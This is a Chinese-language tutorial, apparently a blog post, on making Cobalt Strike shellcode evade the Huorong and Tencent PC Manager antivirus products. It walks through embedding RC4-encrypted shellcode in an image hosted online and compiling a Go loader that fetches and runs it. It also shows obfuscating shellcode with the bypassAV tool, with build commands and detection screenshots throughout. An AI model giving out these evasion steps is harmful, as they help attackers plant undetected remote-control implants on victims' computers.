cobalt strike免杀火绒和管家

本文最后更新于 2025年7月14日 凌晨

0、简介 🚀

CS生成C格式的shellcode:

Attacks ——> packages ——> Payload Generator,选择一个listener生成payload.c。

1、CS-Avoid-killing 🖼️

工具地址:Gality369/CS-Loader: CS免杀 (github.com)

将图片放入同一文件夹,将shellcode填入generator.py

img

img

img

1
2
# 生成的shellcode会自动追加到图片末尾
python2 generator.py YourRC4key ImageName

img

将生成的shellcode图片上传至ImgTP(选择无压缩的图床,保证shellcode不被删减)。然后在CS-Loader.go中填入你的图片URL和RC4key。

1
2
# 编译
go build -ldflags="-H windowsgui" CS-Loader.go

img

img

img

火绒检测效果 🔥

img

腾讯电脑管家检测效果 🛡️

img

2、bypassAV 🛠️

工具地址:pureqh/bypassAV: 免杀shellcode加载器 (github.com)

img

使用步骤:

  1. 将shellcode填入go_shellcode_encode.py生成混淆后的base64 payload
  2. 将生成的base64 payload填入main.gobuild("shellcode")
  3. 替换main.go中的url为可正常访问网页
  4. 编译:
1
go build -trimpath -ldflags="-w -s -H=windowsgui" main.go

img

img

火绒检测效果 🔥

img

腾讯电脑管家检测效果 🛡️

img